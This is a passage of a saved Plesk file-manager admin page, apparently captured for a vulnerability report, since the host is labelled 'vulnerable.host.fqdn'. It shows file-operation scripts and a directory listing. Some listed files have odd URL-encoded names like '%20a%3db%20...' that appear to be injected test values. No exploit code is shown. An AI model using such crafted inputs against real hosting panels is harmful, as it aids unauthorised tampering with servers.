           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/view/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A 